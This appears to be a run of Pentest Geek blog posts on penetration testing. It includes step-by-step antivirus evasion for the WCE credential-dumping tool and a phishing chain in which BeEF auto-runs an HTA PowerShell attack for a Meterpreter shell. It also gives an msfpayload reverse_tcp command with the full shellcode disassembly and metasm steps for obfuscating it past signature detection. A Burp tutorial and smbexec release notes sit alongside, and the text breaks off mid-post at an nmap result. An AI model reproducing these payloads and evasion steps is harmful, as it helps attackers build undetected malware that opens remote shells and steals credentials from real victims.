Bypassing antivirus is always a cat and mouse game, and we’re always trying to stay ahead. I recently had a conversation with Justin Elze (@justinelze) on twitter about his version of WCE getting flagged by McAfee Antivirus.

When I was working on smbexec I knew the wce executable would touch disk and did research to find out how I might be able to get a step ahead in bypassing antivirus vendors. What I found was, for the wce universal binary, the base EXE had resources inside which were run on the target system. Essentially the base EXE was a wrapper that would review the architecture of the target system (32/64) and then launch the proper resource embedded. Essentially what this means is that even though the base EXE is obfuscated and can bypass antivirus, you may not have the same luck bypassing antivirus with the actual resources when they execute. Enter CFF Explorer and crypter for bypassing antivirus.

CFF Explorer

The Explorer Suite was created by Daniel Pistelli, and “…is a freeware suite of tools including a PE editor called CFF Explorer and a process viewer. The PE editor has full support for PE32/64. Special fields description and modification (.NET supported), utilities, rebuilder, hex editor, import adder, signature scanner, signature manager, extension support, scripting, disassembler, dependency walker etc. First PE editor with support for .NET internal structures.”

Essentially what we are able to do is view the PE, extract the resource files, encrypt those and place them back in the PE. The great thing is CFF explorer does all the heavy lifting. All we have is extract and save, below are the steps of the process.

Extracting the Resource Files

First step is to download the wce universal binary zip file from Amplia Security and extract the files. Additionally, please note the initial size of the wce.exe file.

Start CFF explorer and click the Open button to browse to the wce file we will be working on.

Once the file loads, in the left explorer pane, select “Resource Editor” and you will notice the middle pane shows resources in the “BINARY” folder. These are the items we are going to encrypt to in hopes of bypassing antivirus.

Next you simply right-click each item listed and save to your local system by selecting the menu item Save Resource (RAW). NOTE: There are two files listed because one is 32bit and the other 64 bit.

Encrypting the Resource Files

Once you’ve saved of the resources, its now time to encrypt them for bypassing antivirus. There are several tools you can use, in this tutorial I want to highlight a really great (and free) tool called crypter, created by Christian Ammann of Null Security Its important to note that you may need an additional tool to obfuscate the 64-bit file.

Now that we have the file encrypted, its time to put it back into the original wce file. We can do this in CFF explorer with the following steps.

Updating the Executable

Go back to your CFF Explorer and right-click the file you are looking to replace. Select Replace Resource (RAW) from the menu and select your encrypted resource file.

Once the import has been completed, you need to save the file. You will now see that the file size has changed, confirming your new wce file is good to go for testing.

Now that the resource files in the wce executable file are obfuscated, now you can obfuscate the wce.exe file itself if you’d like.

Bypassing Antivirus – Other Tricks

There are a few other tricks that we do that can also help in bypassing antivirus. I like to sign my binaries since a valid cert tends to add a lot of weight to the reputation of a file when reviewed. I sign both the resource files before I place them back in the binary, and then I sign the binary itself. For the past year I have been bypassing antivirus (all different kinds) with relative ease with my encrypted and signed version of wce. The awesome thing is that this is not only relevant to wce, it can come in handy across a load of different PE’s.

Happy Hunting!

The post Bypassing Antivirus with crypter and CFF Explorer appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

If you’re not currently using Phishing Frenzy, BeEF, or PowerSploit for your Phishing campaigns you’re really missing out. In this article we are briefly going to cover what I consider to be one of the “new hotness” attack vectors that every pentester should be using in their next phishing assessment.

With that said we are very pleased to announce that BeEF is now integrated in Phishing Frenzy. If you’re not familiar with BeEF or its capabilities I would highly recommend you check it out. BeEF is the browser exploitation framework and one of the major features is the ability to hook browsers and inject JavaScript into browser sessions.

With the recent addition of BeEF integration to Phishing Frenzy you can now hook and launch client side attacks easier than ever. With a simple click of the button Phishing Frenzy will instantly add JavaScript tags that BeEF requires. This means any target landing on your phishing page will instantly get hooked if JavaScript is enabled (which it usually is!).

BeEF Integration

To hook a browser with BeEF your target will need to invoke a bit of JavaScript often referenced as the hook. The hook is a JavaScript file that typically is hosted on your BeEF server. Here is an example of the required code that can be placed on your phishing website to hook a browser.

<script src=”http://phishingfrenzy.local:3000/hook.js” type=”text/javascript”></script>

This would require that you have a BeEF instance running on port 3000/TCP located at phishingfrenzy.local.

Instead of having to place this bit of JavaScript on every phishing page Phishing Frenzy can assist. If you have enabled BeEF within your campaign options Phishing Frenzy will add this hook on each of the phishing webpages. This will automate the BeEF deployment process and assist in hooking browsers quickly, effectively, and getting you all those juicy shells.

With BeEF enabled your website will have the BeEF tags added to the source code of the HTML automatically.

HTA Powershell Attack

Thanks to the recent addition from antisnatchor to the Phishing Frenzy templates repository you can check out the HTA PowerShell template for a PoC demonstration. Note that the HTA Powershell attack is only viable against modern Internet Explorer browsers.

Now that we know how to quickly hook browsers using Phishing Frenzy and BeEF lets go over automating a real world attack vector that can be extremely effective to gain a shell.

By default BeEF will not launch any modules automatically when a browser is hooked.  You have two primary options for launching modules which are the web UI or configuring specific modules to run automatically. In this example we are going to demonstrate how to launch the HTA_Powershell module automatically.

First thing we need to do is enable the module’s AutoRun attribute so it will run once a browser is hooked. This can be done on a module-by-module basis by editing the respective config.yaml file.

Once AutoRun is enabled you’ll most likely want to change the default values that are configured for the module. In our case BeEF was running at phishingfrenzy.local and our metasploit service was running on 192.168.1.164 so we changed both values as shown below.

These are the only necessary changes needed for BeEF to AutoRun the HTA_Powershell module with our custom values.

Now you’ll need to ensure that you have BeEF service running and your hook.js is fully assessable to the Internet. This is required so the targets can get hooked properly.

Before we send out any emails and start the attack we will want to ensure we have metasploit running with a multi/handler. Here is the example resource script that I run on msfconsole startup.

Now that our BeEF service and multi/hanlder are up and running lets send out some emails so we can get some visitors to our phishing website.

Below is an example email that we sent to hook some browsers off our phishing website.

Once the user clicks on the phishing link they will be directed to a phishing page. When they land on the page BeEF is configured to automatically send the HTA_Powershell module. This will cause a popup for the user where they can “Open”, “Save”, or “Cancel”.

Example of BeEF sending HTA_Powershell module to visitors who are hooked automatically without interaction.

Example of HTA Powershell popup notification.

Once a user clicks the “Open” button HTA code execution will occur. The HTA, if allowed to run, runs via a completely different executable called “mshta.exe”. Code inside an HTA run in a more privileged context, and allows you do more stuff like calling OS commands such as “powershell.exe.” PowerShell then leverages PowerSploit to invoke-shellcode and give us the shell while mitigating the risk of getting caught by Antivirus.

If everything goes properly you should be greeted with a Meterpreter shell that we all know and love.

For all of those who love a video demonstration, here is Phishing Frenzy + BeEF + PowerSploit + Metasploit == FTW:

Again, if your not using Phishing Frenzy, BeEF or PowerSploit for your Phishing I highly suggest you check it out. For more information checkout www.phishingfrenzy.com

Enjoy Phishing all the things with Phishing Frenzy!

The post Phishing Frenzy: HTA PowerShell Attacks with BeEF appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

In the last article we introduced some of the useful features that Burpsuite has to offer when performing a Web Application Penetration Test. In part 2 of this series we will explore some additional functionality including: Validating Scanner Results, Exporting Scanner Reports, Parsing XML Results, Saving a Burp Session and Burp Extensions. Lets get right to it!

Burp Suite Tutorial – Validating Scanner Results

Its always a good idea to thoroughly validate the results of any automated scanning tool. Burpsuite provides everything you need to do this on the “Scanner/Results” tab. Click on a node in the left pane to see the identified vulnerabilities associated with that target. The right-hand lower pane displays the verbose Request/Response information pertaining to the specific vulnerability selected from the right-hand upper pane.

The “Advisory” tab contains information about the vulnerability including a high-level detail, description and proposed recommendation. The “Request” & “Response” tabs will display exactly what Burpsuite sent to the target application in order to check for the vulnerability as well as what was returned by the application. Take a look at the example below.

Figure #1 – Validating Scanner Results

The request tab shows us which page generated the alert.

https://www.pentestgeek.com/wp-content/cache/minify/000000/NYtBDoAgDMA-JFsML5oEYShDYSbwez3goUl7qMV0P76OxU4xmUMl9ZBZlhVdpVHEtCFK3UQO8fxQXzE13Enc2EqfK_wNLKxwkTte.js

Just by requesting this page in a browser, or viewing the “Response” tab, We are able to validate that the email address allegedly disclosed was in fact present in the response. We can consider this issue to be validated and move on.

Figure #2 – Validating Scanner Results

#ProTip Make sure to perform this step on each and every vulnerability identified by the scanner. All automated scanning tools produce false-positives due to the nature of the testing being done. Most companies are capable of buying tools and running them on their networks. Pentesters are hired specifically to identify and remove these false positives

Burp Suite Tutorial – Exporting Scanner Reports

Once you have validated the scanner results you might want to generate some type of a report. There are two report options available from the “Scanner/Results” tab, HTML and XML. To generate a report right-click on a target from the left-hand display pane and select “Report selected issues”. This will present you with the following Dialog box.

Figure #3 – Exporting Scanner Reports

Click through the Wizard and select which items you want in your report and which format. The HTML report can be opened up in a browser and then exported to a PDF format which can be useful to help communicate findings to your client. The XML report allows you to parse out specific sections of a report for more granular detail. If you generate an XML report, make sure you uncheck the Base64 encoder option to see full HTTP Request/Responses.

Burp Suite Tutorial – Parsing XML Results

I’ve written a simple Ruby script to parse out data from the XML output generated from an automated Scan. The script utilizes the Nokogiri gem and outputs the results into a column delimitated CSV file which can be imported into Excel to produce a nice spreadsheet. If you have a basic understanding of parsing XML nodes using CSS selectors, you will have no trouble modifying the script to suite your specific needs.

Head over to the Git repository and clone the branch. Looking at the source code we can see where the parsing magic takes place.

def clean_finding(finding)
  output = []
  output << 'Web Application Findings'
  output << ''
  output << finding.css('severity').text
  output << 'Open'
  output << finding.css('host').text
  output << finding.css('path').text
  output << finding.css('issueDetail').text
  output << finding.css('name').text
  output << finding.css('issueBackground').text
  output << finding.css('remediationBackground').text
  response = finding.css('response').text
  if response.include?('Server:')
    output << response.split('Server: ')[1].split("\n")[0]
  end
  output
end

You can see that simply calling the .css method and passing (‘[VALUE YOU WANT]‘).text as a paramater will allow you to scoop out whatever specific items you would like from the XML soup. Run the script with no arguments and you’ll see it takes an XML file and spits output to the screen.

[ # ] $ ./parse-burp.rb
Parse Burpsuite XML output into Tab delimited results
Example: ./parse-brup.rb > output.csv

[ # ] $

You can cat out the results into a file.csv if you like. The CSV file can then be imported into an Excel spreadsheet which looks like this.

Figure #4 – Parsing XML Results

Burp Suite Tutorial – Saving a Burp session

In some cases it might be necessary to pause an assessment and come back later. You also might find yourself wanting to share your Burpsuite session with another consultant. Two eyes are often better then one after all. In these instances the easiest thing to do is to save a local copy of your session. Simply select “Save state” from the Burp menu at the top. This will create a flat file which you or another consultant can import into Burpsuite and see all of the captured traffic and test cases. This is an extremely useful feature.

If you have tried to do this in the past and noticed the size of the resulting file to be unnecessarily large (hundreds of MBs). It is possible you forgot to check the “Save in-scope items only” check-box.

Figure #5 – Saving a Burp session

If you setup your scope following the guidelines in Part 1 you shouldn’t have to worry about a massive sate file. The next page of the Wizard asks you which tools you would like to store the configuration of. I have found that having them all checked or all unchecked does not appear to affect the size of the file much if at all but feel free to play with these options and make up your own mind.

Figure #6 – Saving a Burp session

To restore a previously saved burp sate simply select “Restore state” from the Burp menu at the top. Select the file from your system, click “Open” and follow the instructions of the Wizard. Depending on the size of the state file it may take a moment to import everything but once finished you can continue your assessment or someone else’s for that mater as if you had never paused in the first place. Its pretty cool!

Burp Suite Tutorial – Burp Extensions

Burp extensions are after-market additions written by other pentesters that can be easily installed and configured to add enhanced or additional features to Burpsuite. To demonstrate this process we’ll download and install the “Shellshock Burp Plugin” from the Accuvant LABS Github page. Browse to the following URL https://github.com/AccuvantLABS/burp-shellshock and click the “Download here!” link.

Figure #7 – Click the Download here! link

Next click on the “Extender” tab within Burpsuite and click he “Add” button at the top-left corner. When the dialog box pops up select the Shell Shock .jar file you just downloaded and click Next.

Figure #8 – Select the .jar file

If everything went well you should see a message stating “The extension loaded successfully” with no errors messages or output. Now the Extensions tab shows our “Shellshock Scanner” extension is loaded. We can see from the Details section that a new Scanner check has been added.

Figure #9 – Burp Extension loaded successfuly

Burp Suite Tutorial – End Of Part2

I hope this tutorial was useful to you. After reading both articles in this series you should be familiar with many of the critical features offered within the Burpsuite. Please take advantage of the comment section below to provide feedback/questions or check us out on the Pentestgeek Forums. Thanks for reading!

The post Burp Suite Tutorial – Web Application Penetration Testing (Part 2) appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

It’s been a little over a year since I started phishing full time with Phishing Frenzy and there is no looking back now. The project has really come a long way since I first started with it. I can’t thank the community enough for all the support and contributions along the way. Phishing today seems more enjoyable than ever before and I owe a lot of that gratification to Phishing Frenzy.

If you haven’t had a chance to checkout the project, I highly recommend you do and get involved. We are always seeking new templates to be added to our official gallery for the entire community to use, tweak and share.

I envision someday we will have a catalog containing hundreds of templates for the entire community. Wouldn’t it be nice to have a new shiny template already built for you on your next phishing gig? It’s up to the community to make that vision a reality by contributing.

• www.phishingfrenzy.com/templates/index

There has been a lot of new changes with the most recent version of Phishing Frenzy. I’m going to cover some of those changes in this article.

Rails 4 Upgrade

Previously Phishing Frenzy was running on Rails 3.2. We recently have upgraded the application to the latest version Rails 4.1.7. This was a slow painful process to upgrade the application and all the gems, but it ultimately patches some security vulnerabilities and offers a lot of flexibility for the app moving forward.

SSL Support for Phishing Sites

When performing a phishing gig we often use credential harvesting to obtain valid passwords. In the past Phishing Frenzy had no support to run your phishing site on HTTPS. We are pleased to announce that we have added SSL support for running phishing websites over HTTPS. This is all done completely through the web UI by simply uploading your 3 certificate files required by Apache.

• SSLCertificateFile
• SSLCertificateKeyFile
• SSLCertificateChainFile

Once the SSL files have been uploaded to the campaign Phishing Frenzy will automatically deploy the website over HTTPS once the campaign is activated.

Code Syntax Highlighting

We often need to tweak and edit our templates from campaign to campaign. Previously Phishing Frenzy had a simple text form that was available to edit and update the raw text. It was difficult to detect mistakes and didn’t offer any code syntax highlights. We recently changed all this and added in the CodeMirror JavaScript library to help bring in a little more bling bling when editing your templates.

Conclusion

We have been hard at work making this project a stable platform for the entire  community to phish from. We hope you see the value in the project and get involved to make it something even better. The project has been gaining a lot of traction over the last couple of months and I’m excited to see where we end up 1 year from now.

As always, submit your tickets to the github issues page located here, and enjoy phishing all the things!

The post Phishing Frenzy: SSL Support on Rails 4 with Syntax Highlighting appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

We released smbexec version 2.0 a few days ago and it comes with some rather large differences from previous versions. For one thing it was completely rewritten in Ruby, for another it now supports multi-threading. While it still maintains all of the functionality of previous versions (remotely dumping hashes from systems or domain controllers, identifying where domain administrators credentials are in use, throwing around obfuscated meterpreters, etc) , I wanted to highlight some of the larger changes and new features in this release.

For those that don’t know what smbexec is or haven’t used it before there was a great derbycon presentation  at the 2013 conference found here by Martin Bos (purehate) and Eric Milam (brav0hax). The quick description is that smbexec is a tool that focuses on using native windows functions/features for post exploitation and expanding access on a network after you gain some credentials, whether that be a hash or password for a local or domain account. It allows a pentester to quickly identify targets of interest and gain access to them across large networks without much need to worry about AV and UAC. You can grab the code at the pentestgeek github repo.

Ruby and Multi-threading

With the switch to Ruby from shell there are a bunch of added benefits. The biggest one is multi-threading, which makes a significant difference when pen testing a larger network. Last engagement a few of us were at we were running smbexec with 30 threads and dumped the local SAM, cached, and in memory credentials from about 750 servers in a matter of minutes. In addition to the speed gains there is also a significant increase in logging, when any module runs a debug file is created containing information about the module as well as showing a time stamped line with command issued along with the result. We were also able to remove some of the dependencies previous versions required, added more robust error handling, and designed it in a way that makes adding additional modules/features in the future much much easier.

Here is an example of what version 2.0 looks like using the hashdump module:

Finding Juicy Files and Running Arbitrary Powershell

And with the other changes we also have added two more modules. The first, a module used for finding files, has been extremely useful to me so far on penetration tests. By default it looks for unattend files which, if present, usually have privileged credentials contained within but you can look for anything you want. In addition for looking for other things like passwords.xls (Which I have seen way too many times) I personally look for something like *financ*.xls* to look for data that would be considered critical to the business. It can make showing the impact of a vulnerability a lot easier if you have access to nothing but a bunch of workstations for instance. The results of this module can get VERY large, in the thousands per machine even,  if you decide to look for something vague like *.xls or *.doc so the results are saved into text files within the log directory so you can use some command line fu to parse the data to look for what you want.

File Finder Module:

The other module can deliver and run arbitrary powershell against the targets. To do this you only need to drop whatever is your favorite non-interactive powershell script into the powershell folder and it will be available for use. Currently there is only one very simple powershell script but we plan on expanding on this in the future. The results of the powershell script will be saved into text files within the log directory as well.

Powershell Module:

Config and option parser

To make things easier on the user we implemented both a configuration file (smbexec.yml) as well as command line options that should cover most use cases for smbexec. You can give it credentials, an ip range (nmap style supported, or nmap xml file itself), or the number of threads you want to use before starting smbexec and it will remember them for all modules.

These are the command line options:

The configuration file has more granular control over how the tool works, for instance you can set it to use screen sessions over xterm windows or to not use nmap and use a simple TCP full connect port scanner. You also can change the paths to dependencies, by default the configuration file is for a Kali image.

And here is what the smbexec.yml configuration file looks like:

Installation

1) git clone https://github.com/pentestgeek/smbexec.git

2) Run the install.sh script, select your operating system, and supply any required information

3) Run the install.sh script and compile the binaries

4) Type smbexec and cause mass havoc

Wrap up

Now that we have built the framework out in Ruby we should have more updates/features coming up faster and we are already scoping out what we want to do for version 2.1. If you have any issues or feature requests please toss them onto the github page.

The post Smbexec 2.0 released appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

Preface

It seems that more and more these days I find myself battling head to head against my client’s Antivirus Detection capabilities. Payloads I encoded to successfully bypass one solution get picked up by another. An executable that walked effortlessly past one AV this week gets stopped dead in its tracks by the very same software build at a different client the week later. This is a frustrating and constant problem for myself and many other Penetration Testers I am sure.

The topic of Antivirus Detection bypass is not a new one by any means. Currently there exist several methodologies that work well and I don’t think anyone (at least no one I know) can respectfully make a claim for a particular method being the De facto standard that works every time.

This article aims to provide some insight into one such method that I have become fond of and has proven quite successful in many of my recent Information Security Assessments. I first became aware of the technique by reading This Great Writeup from exploit-db. I’m not sure if the author is responsible for coining the term or not but they refer to this ancient wisdom and all of its magical powers under the alias “Ghost Writing” which I think sounds super cool!

Brief Introduction To Antivirus Detection Methodologies

If one hopes to successfully get around Antivirus software it’s probably a good idea to understand just how they determine that a malicious application is in fact “malicious”. For a detailed and probably much more accurate explanation of this phenomenon Click here to become Wikipedafied!!

The Cliff Notes Version:
Speaking quite generally, Antivirus Engines are capable of detecting malicious applications usually by one of two basic methodologies.
<– insert rant –>
Don’t tell the Antivirus vendors that though because they would have you believe that there are 10 completely different methods of detection in order to squeeze you somewhere into their 10-tier pricing matrix
<– end rant –>
Heuristic base analysis, in which case the AV engine monitors the behavior of the application and determines based on a predetermined set of criteria if the behavior can be classified as being malicious. This can happen in a sandboxed environment that is generated pre-execution time or dynamically inside a process’s virtual memory space while it is running. This is the current most effective and accurate way to guard against viruses and malware applicaitons. A good heuristic based engine constantly monitors the behavior of all applications and “teaches themselves” to become smarter on a regular basis.

The second and older method is called many names, we will use the term Static Binary Analysis. It doesn’t matter what you call it as long as you understand how it works. In SBA the AV engine looks at the binary data (the machine language instructions) of the application as it sits on the disk and checks for known sequences of malicious instructions, for example the instructions for opening up a TCP port and binding it to “cmd.exe”. These small pieces of code are called “signatures”. For signature detection to be successful your AV vendor needs to know every piece of malicious code out there and have accurate and up-to-date definitions for you on a daily basis. That’s even more difficult to do then it sounds. As luck would have it, most main stream AV vendors (even the ones claiming to be heuristic, shhhh..) still incorporate SBA in some way or another into their products. We can use the flaw in this logic to bypass AV detection by “Obfuscating” or “Ghost Writing” our binary data in such a way that it does not contain any known signatures. Now on to the fun stuff.

Building Our Malicious Executable

First we will build the malicious executable that we want to bypass Antivirus Detection using msfpayload, one of our very closest companions :)


$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary


In the above command you should change ’192.168.1.100′ to whatever IP address you want your victim to connect back to.

The Metasm Ruby Library

Now that we have created a “raw” binary file we have to disassemble it into readable machine language or Assembly Code. To do this we will use the “metasm” ruby library that ships natively with the metasploit framework. In order for the library to function you must first copy the metasm.rb file and metasm directory into your system’s ruby installation path. On my system doing so looks like this


cd ~/tools/metasploit/lib/metasm
cp -a metasm.rb metasm /opt/local/lib/ruby1.9/site_ruby/1.9.1


Now we can disassemble the binary file we created earlier.


$ ruby ~/tools/metasploit/lib/metasm/samples/disassemble.rb raw_binary > asm_code.asm


That will create a file called asm_code.asm which should look something like this

asm_code.asm

entrypoint_0:
cld ; @0 fc
call sub_8fh ; @1 e889000000 x:sub_8fh
pushad ; @6 60
mov ebp, esp ; @7 89e5
xor edx, edx ; @9 31d2
mov edx, fs:[edx+30h] ; @0bh 648b5230 r4:segment_base_fs+30h
mov edx, [edx+0ch] ; @0fh 8b520c r4:unknown
mov edx, [edx+14h] ; @12h 8b5214 r4:unknown

// Xrefs: 8dh
loc_15h:
mov esi, [edx+28h] ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown
xor edi, edi ; @1ch 31ff

// Xrefs: 2ch
loc_1eh:
xor eax, eax ; @1eh 31c0
lodsb ; @20h ac
cmp al, 61h ; @21h 3c61
jl loc_27h ; @23h 7c02 x:loc_27h

sub al, 20h ; @25h 2c20

// Xrefs: 23h
loc_27h:
ror edi, 0dh ; @27h c1cf0d
add edi, eax ; @2ah 01c7
loop loc_1eh ; @2ch e2f0 x:loc_1eh

push edx ; @2eh 52
push edi ; @2fh 57
mov edx, [edx+10h] ; @30h 8b5210 r4:unknown
mov eax, [edx+3ch] ; @33h 8b423c
add eax, edx ; @36h 01d0
mov eax, [eax+78h] ; @38h 8b4078
test eax, eax ; @3bh 85c0
jz loc_89h ; @3dh 744a x:loc_89h

add eax, edx ; @3fh 01d0
push eax ; @41h 50
mov ecx, [eax+18h] ; @42h 8b4818
mov ebx, [eax+20h] ; @45h 8b5820
add ebx, edx ; @48h 01d3

// Xrefs: 66h
loc_4ah:
jecxz loc_88h ; @4ah e33c x:loc_88h

dec ecx ; @4ch 49
mov esi, [ebx+4*ecx] ; @4dh 8b348b
add esi, edx ; @50h 01d6
xor edi, edi ; @52h 31ff

// Xrefs: 5eh
loc_54h:
xor eax, eax ; @54h 31c0
lodsb ; @56h ac
ror edi, 0dh ; @57h c1cf0d
add edi, eax ; @5ah 01c7
cmp al, ah ; @5ch 38e0
jnz loc_54h ; @5eh 75f4 x:loc_54h

add edi, [ebp-8] ; @60h 037df8
cmp edi, [ebp+24h] ; @63h 3b7d24
jnz loc_4ah ; @66h 75e2 x:loc_4ah

pop eax ; @68h 58
mov ebx, [eax+24h] ; @69h 8b5824
add ebx, edx ; @6ch 01d3
mov cx, [ebx+2*ecx] ; @6eh 668b0c4b
mov ebx, [eax+1ch] ; @72h 8b581c
add ebx, edx ; @75h 01d3
mov eax, [ebx+4*ecx] ; @77h 8b048b
add eax, edx ; @7ah 01d0
mov [esp+24h], eax ; @7ch 89442424
pop ebx ; @80h 5b
pop ebx ; @81h 5b
popad ; @82h 61
pop ecx ; @83h 59
pop edx ; @84h 5a
push ecx ; @85h 51
jmp eax ; @86h ffe0

// Xrefs: 4ah
loc_88h:
pop eax ; @88h 58

// Xrefs: 3dh
loc_89h:
pop edi ; @89h 5f
pop edx ; @8ah 5a
mov edx, [edx] ; @8bh 8b12 r4:unknown
jmp loc_15h ; @8dh eb86 x:loc_15h

// Xrefs: 1
sub_8fh:
// function binding: ebp -> dword ptr [esp], esp -> esp-10h
// function ends at 0a0h
pop ebp ; @8fh 5d
push 3233h ; @90h 6833320000
push 5f327377h ; @95h 687773325f
push esp ; @9ah 54
push 726774ch ; @9bh 684c772607
call ebp ; @0a0h ffd5 endsub sub_8fh noreturn
db 0b8h, 90h, 1, 0, 0, 29h, 0c4h, "TPh)", 80h, 6bh, 0 ; @0a2h
db 0ffh, 0d5h, "PPPP@P@Ph", 0eah, 0fh, 0dfh, 0e0h, 0ffh ; @0b0h
db 0d5h, 97h, 6ah, 5, 68h, 0c0h, 0a8h, 1, 64h, 68h, 2, 0, 1, 0bbh, 89h, 0e6h ; @0c0h
db 6ah, 10h, "VWh", 99h, 0a5h, 74h, 61h, 0ffh, 0d5h, 85h, 0c0h, 74h, 0ch, 0ffh ; @0d0h
db 4eh, 8, 75h, 0ech, 68h, 0f0h, 0b5h, 0a2h, 56h, 0ffh, 0d5h, 6ah, 0, 6ah, 4, 56h ; @0e0h
db 57h, 68h, 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 8bh, "6j@h", 0, 10h, 0 ; @0f0h
db 0, 56h, 6ah, 0, 68h, 58h, 0a4h, 53h, 0e5h, 0ffh, 0d5h, 93h, 53h, 6ah, 0, 56h ; @100h
db "SWh", 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 1, 0c3h, 29h, 0c6h, 85h, 0f6h, 75h ; @110h
db 0ech, 0c3h ; @120h

Manual Obfuscation

Right about now would be a perfect time to reference one of my favorite begging Assembly Language tutorial videos:
http://www.securitytube.net/groups?operation=view&groupId=5

Now that we have some ASM know-how we can start getting our hand s dirty with some Ghost Writing. Start adding random ASM instructions in the middle of the various code sections. I know, it would be much more effective to first determine precisely which bytes are flagging your target AV but that’s really another article in it’s self. For now, we’ll continue with the “spray and pray” methodology. You can add anything you want so long as you don’t break the functionality of the application. I find that simply pushing registers onto the stack and then popping them back off sometimes will do the trick. Also just before a XOR statement (which is often used to set the value of a register to zero) you can add a bunch of random statements to increment and decrement the register, move values of other registers into it. Anything you do won’t matter because eventually you will be changing the value to zero. So using the above example we can change the section beginning with ‘// Xrefs: 8dh’

From This:

// Xrefs: 8dh
loc_15h:
mov esi, [edx+28h] ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown
xor edi, edi ; @1ch 31ff

To This:

// Xrefs: 8dh
loc_15h:
mov esi, [edx+28h] ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown
mov edi, ecx ; Move the contents of the ECX register into the EDI Register
push edi ; Push the EDI register onto the current stack frame
pop edi ; Pop it back off
mov edi, ecx ; Mov ECX back into edi
xor ecx, ecx ; Zero out the contents of the ECX register
mov ecx, edi ; Mov EDI back into ECX
xor edi, edi ; @1ch 31ff

So here we turned 3 lines of code into 9 however lines 3-8 result in the same values for ECX and EDI as the original code. This is essentially what it means to obfuscate code.

Once you’ve finished mangling your ASM code you need to add the following two lines to the top of the file for it to build correctly.

.section '.text' rwx
.entrypoint

Someone in the #metasploit IRC was kind enough to point that out to me, Im sorry I can’t remember who it was because so many smart people in the #metasploit room help me out on a regular basis. You know who you are, and thank you!

The final step is to use metasm to build the executable and package it into a format that Windows can run.


$ ruby ~/tools/metasploit/lib/metasm/samples/peencode.rb asm_code.asm -o coolstuff.exe


Run a file check on coolstuff.exe to verify that it was built correctly. You should see something like this when finished.


$ file coolstuff.exe
coolstuff.exe: MS-DOS executable, MZ for MS-DOS


If everything went according to plan, you should be left with a random enough binary file that doesn’t match up with any of your target signatures and is free to pwn systems free from Antivirus Detection. That’s all for now, hope you enjoyed reading. Hack responsibly!

The post Using Metasm To Avoid Antivirus Detection (Ghost Writing ASM) appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

Recently I was conducting an internal penetration test for a client that is part of the financial industry.  Since this client is a financial institution they are required to have an independent 3rd party company audit their security once a year per NCUA and FDIC requirements.  That’s where I come in, I get paid to hack companies like banks and credit unions.  Internal penetration testing is probably one of my favorite engagements to conduct because of the wealth of information you can obtain on an internal network.  Devices on the internal network typically do not have firewalls so you have unrestricted access to every port a network device will serve up.  There are so many devices on the internal network, and each one tells a story.

During this recent assessment I had brought out my typical attack vectors but was striking out. I typically run Nessus as my primary vulnerability scanner, but like every tool I don’t trust it to be the holy grail.  Understanding how a tool works is the best way to get a better understanding of how to find more vulnerabilities in the case that your tools don’t find anything, or malfunction.  I’ve met penetration testers that will see zero high risk findings in Nessus and throw up their hands thinking there is no way to penetrate this network.  When I see a scan that comes back clean with zero high risk findings, I get excited thinking this one’s gonna be a challenge.

Sitting on this internal network the Nessus scan had completed and came up pretty clean.  I brought out my typical arsenal of attacks including but not limited to brute forcing mssql accounts, searching for Apache Tomcat servers that had weak or easily guessable password, sending medusa after the built-in local Administrator account since I enumerated it via null sessions along with the fact this account cannot be locked out by default, nbns_spoofing harvested network hashes but the netLM was disabled leaving me only with netNTLM which is difficult to crack, numerous metasploit auxiliary modules were run along with various other scripts and tools.

I then started to analyze the results of the raw *.nmap files from the nmap scans that I had run earlier.  Recently nmap has been making a lot of progress with the use of it’s NSE scripts that look for various vulnerabilities or issues.  Nmap is no longer just a port scanner, it is much more than that now, and I think we will continue to see additional functionality as the NSE scripts continue to grow in popularity.

While I was looking through one of the nmap files I found the following information that looked incredibly useful:

Nmap scan report for 192.168.1.100
Host is up (0.021s latency).
Scanned at 2012-01-16 11:18:26 CST for 609s
Not shown: 991 filtered ports
PORT     STATE  SERVICE         VERSION
22/tcp   open   ssh             OpenSSH 3.6.1p2 (protocol 2.0)
| ssh-hostkey: 1024 1a:60:be:9a:80:2e:07:64:aa:6c:c3:a6:62:6a:c5:83 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAOaU5YuKspj/vAeV775pdGJQV4MDO1vTiT0jp/uWGEMQXElOgy4jqhdOETJ4vI7CuXc8hz5xBEqsMbBblqLLZnBbU3Mbb5b8Bd4JfRc//E3/bo5tnGKCKleQ3UaeMR3hprPno8uZMvNm5pQfOCgE5TjVydH+5XIQXYgq9KXL8g4lAAAAFQDiftzyK/eBRaox1hsxKQ79CFqSBQA$
| 1024 92:66:8a:a5:ea:9e:b3:bc:d7:f3:9e:ee:f5:58:32:a5 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA5YQDOv3u738Tt0wA5dQHj9vUPEgoB7JT82t/NqyZZ7XW8ztG8PQYR/hmVwTvgmZGEr1Cb9UlJONMCyAvycFYdaEg3/NUdGosqzLrb74lqOinbaCVELCEroYi08hMXP+RyObDWiUjaR+9ou6q208WBAt/5nkkhEh2nhpEPHZP3Lk=
80/tcp   open   http            VMware ESX 3.5 Server httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Did not follow redirect to https://192.168.1.100/ and no page was returned.
427/tcp  closed svrloc
443/tcp  open   ssl/http        VMware ESXi Server httpd
|_http-title: " + ID_ESX_Welcome + "
| http-vmware-path-vuln:
|   VMWare path traversal (CVE-2009-3733): VULNERABLE
|     /vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k3/Win2k3.vmx
|     /vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k3-1/Win2k3-1.vmx
